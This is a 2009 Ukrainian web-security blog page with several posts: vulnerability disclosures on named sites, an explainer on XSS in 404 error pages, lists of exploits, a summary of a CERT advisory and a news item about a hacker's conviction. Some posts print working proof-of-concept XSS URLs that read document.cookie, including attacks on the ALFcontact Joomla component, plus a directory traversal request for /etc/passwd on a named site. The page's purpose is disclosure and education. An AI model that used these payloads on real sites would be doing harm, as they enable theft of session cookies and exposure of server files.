Уразливість на wap.samsung.ua

23:52 05.09.2009

Нещодавно, 03.09.2009, я знайшов Cross-Site Scripting уразливість на проекті http://wap.samsung.ua. Про що найближчим часом сповіщу адміністрацію проекту.

І хоча попередні три уразливості (знайдені мною в серпні 2008), що були пов’язані з уразливістю в Apache Tomcat, вони вже виправили, але я легко знайшов нову.

XSS:

XSS уразливості на 404 сторінках

22:47 05.09.2009

Cross-Site Scripting (XSS) уразливості дуже поширені в Інтернеті, що добре видно з моїх новин. Я регулярно знаходжу подібні уразливості на веб сайтах, про що пишу в себе на сайті, а також згадую про знайдені іншими секюріті дослідниками XSS дірки на відомих сайтах. Також я не раз писав про XSS хробаків.

XSS уразливості мені доводилося знаходити у різних веб додатках, а також у браузерах та веб серверах. Після уразливостей в пошуковцях, про що я вже писав детально в своєму проекті MOSEB, одними з найбільш поширених є XSS на Error 404 сторінках, про що я розповім детально.

Стандартний вектор атаки у випадку XSS на 404 сторінках - це вказання XSS-коду в якості адреси сторінки на сайті, що призведе до виведення 404-ї сторінки і до виконання JavaScript коду.

XSS:

http://site/%3Cscript%3Ealert(document.cookie)%3C/script%3E

Подібні XSS бувають reflected, persistent, DOM based та strictly social.

Прикладом persistent XSS на 404 сторінці є уразливість в Power Phlogger (код спрацює при перегляді логів відвідувань). DOM based XSS мені також траплялися, зокрема в компоненті ProofReader для Joomla. А reflected XSS на 404 сторінках - це найбільш поширений випадок. Прикладами даних XSS є уразливості на mts.com.ua, в Apache Tomcat та в Joomla.

А також уразливості в браузерах, що проявляються на 404 сторінках: Cross-Site Scripting з використанням UTF-7 в IE (reflected) та Cross-Site Scripting з UTF-7 в Mozilla та Firefox (strictly social XSS).

Так що розробникам веб серверів, браузерів та веб сайтів варто завжди перевіряти свої розробки на наявність XSS уразливостей на 404 сторінках (як і на усіх інших сторінках про помилки). Щоб не допускати уразливостей на даних сторінках.

Добірка уразливостей

16:11 05.09.2009

В даній добірці уразливості в веб додатках:

  • Vulnerability in Oracle WebLogic Apache Connector (деталі)
  • OpenNMS Multiple Vulnerabilities (деталі)
  • Arbitrary code execution in lynx (деталі)
  • NewLife Blogger <= v3.0 / Insecure Cookie Handling & SQL Injection Vulnerability (деталі)
  • Iltaweb Alisveris, Sistemi (tr) Sql inj (деталі)
  • Oracle: CREATE ANY DIRECTORY to SYSDBA (деталі)
  • Webscene eCommerce (level) Remote Sql Injection (деталі)
  • WEB//NEWS SQL Injection and Cookie Manipulation (деталі)
  • Vivid Ads Shopping Cart (cid) Remote SQL Injection (деталі)
  • Smarty 2.6.20 php injection (деталі)

Уразливості на www.ejls.eu

22:44 04.09.2009

06.06.2009

У вересні, 18.09.2008, а також додатково сьогодні, я знайшов Arbitrary File Disclosure, Directory Traversal, Full path disclosure та Cross-Site Scripting уразливості на проекті http://www.ejls.eu. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

04.09.2009

Arbitrary File Disclosure:

http://www.ejls.eu/download.php?file=download.php

Directory Traversal:

http://www.ejls.eu/download.php?file=../etc/passwd

Ці дві дірки вже виправлені.

Full path disclosure:

http://www.ejls.eu/load.php?action=1

XSS:

Половина з даних уразливостей досі не виправлена.

Численні уразливості в Opera Unite

19:20 04.09.2009

Виявлені численні уразливості безпеки в Opera Unite - технології, що доступна в браузері Opera 10.

Уразливі версії: Opera Unite 10.0.

Підміна запитів, міжсайтовий скриптінг, витік інформації та інші.

Добірка експлоітів

16:09 04.09.2009

В даній добірці експлоіти в веб додатках:

  • ManageEngine Firewall Analyzer 5 XSRF/XSS Vulnerability (деталі)
  • GNUBoard 4.31.04 (09.01.30) Multiple Local/Remote Vulnerabilities (деталі)
  • Amaya Web Editor 11 Remote SEH Overwrite Exploit (деталі)
  • ReVou Twitter Clone (XSS/SQL) Multiple Remote Vulnerabilities (деталі)
  • SkaLinks 1.5 (Auth Bypass) SQL Injection Vulnerability (деталі)
  • Orca 2.0.2 (Topic) Remote XSS Vulnerability (деталі)
  • BPAutoSales 1.0.1 (XSS/SQL) Multiple Remote Vulnerabilities (деталі)
  • eVision CMS <= 2.0 (field) SQL Injection Vulnerability (деталі)
  • SMA-DB 0.3.12 (RFI/XSS) Multiple Remote Vulnerabilities (деталі)
  • WholeHogSoftware Password Protect (Auth Bypass) SQL Injection Vuln (деталі)
  • WholeHogSoftware Ware Support (Auth Bypass) SQL Injection Vuln (деталі)
  • AJA Portal 1.2 Local File Inclusion Vulnerabilities (win) (деталі)
  • Flatnux 2009-01-27 (Job fields) XSS/Iframe Injection PoC (деталі)
  • Small HTTP Server <= 3.05.85 Directory Traversal Exploit (деталі)
  • Exploits FOSS Gallery Admin Version <= 1.0 / Remote Arbitrary Upload Vulnerability (деталі)

Нові уразливості в ALFcontact для Joomla

23:51 03.09.2009

Сьогодні я знайшов Cross-Site Scripting уразливості в компоненті ALFcontact (com_alfcontact) для Joomla. Це форма відправки повідомлень власнику сайта. Дані уразливості я виявив на одному веб сайті. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в com_alfcontact для Joomla.

XSS:

Можлива атака як через POST, так і GET запити.

http://site/component/option,com_alfcontact/?name=%22%20style=%22xss:expression(alert(document.cookie))
http://site/component/option,com_alfcontact/?email=%22%20style=%22xss:expression(alert(document.cookie))
http://site/component/option,com_alfcontact/?subject=%22%20style=%22xss:expression(alert(document.cookie))
http://site/component/option,com_alfcontact/?message=%22%20style=%22xss:expression(alert(document.cookie))

Уразливі ALFcontact 1.8, 1.9 та попередні версії. У версії ALFcontact 1.9.1 працюють перші три з чотирьох уразливостей.

Опис Cross-Site Scripting від CERT

22:47 03.09.2009

В своій статті CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests CERT розповідає про Cross-Site Scripting (XSS). Стаття датована 02.02.2000 - це перша документована згадка про такий вид уразливостей, як XSS. В тому числі в тексті використаний термін “Cross-Site Scripting” для позначення атак з включенням html-тегів в сторінки сайтів.

В статті йдеться про reflected XSS. Зазначу, що про persistent XSS було відомо ще в 1998, про що в Мережі є публікації за той час. Просто лише з появою reflected XSS (на початку 2000 року), почали вживати сам термін XSS, а до цього persistent XSS уразливості просто називали “ін’єкціями скриптів”.

В даній статті подається опис Cross-Site Scripting уразливостей, їх вплив та рекомендації по їх усуненню.

У Херсонській області засуджений хакер

19:25 03.09.2009

Український хакер засуджений до двох років позбавлення волі з іспитовим терміном один рік.

Набрав сили вирок суду Комсомольського району Херсона по кримінальній справі місцевого жителя, що несанкціановано втрутився в роботу одного з інтернет-провайдерів. 24-літній студент заволодів реквізитами реєстрації абонентів на сервері, що використовував для виходу в Інтернет, що привело до блокування доступу користувачів до інформаційних масивів Мережі і завдало матеріальної шкоди більш ніж 200 абонентам.

Суд визнав винним місцевого жителя в здійсненні злочину, передбаченого ч. 1 ст. 361 КК України. Також він повинний компенсувати збитки потерпілим і оплатити штраф. Комп’ютерне устаткування хакера конфісковано в доход держави.

По матеріалам http://ain.ua.

Добірка уразливостей

16:18 03.09.2009

В даній добірці уразливості в веб додатках:

  • Directory traversal and NULL pointer in Acronis PXE Server 2.0.0.1076 (деталі)
  • Yerba SACphp <= 6.3 / Local File Inclusion Exploit (деталі)
  • HostAdmin 3.* Remote File Include Vulnerabilities (деталі)
  • FOSS Gallery Public Version <= 1.0 / Arbitrary file upload Vulnerabilities (деталі)
  • FOSS Gallery Admin Version <= 1.0 / Remote Arbitrary Upload Vulnerability (деталі)
  • Unauthenticated SQL Injection, XSS on Login Page and Username Enumeration on DPSnet Case Progress (деталі)
  • News Manager Remote SQL Injection Vulnerability (деталі)
  • FC2 BLOG Cross-Site Scripting Vulnerabilities (деталі)
  • OpenX 2.4.9 and 2.6.2 fix SQL injection vulnerability (деталі)
  • HP-UX Running ftp, Remote Denial of Service (DoS) (деталі)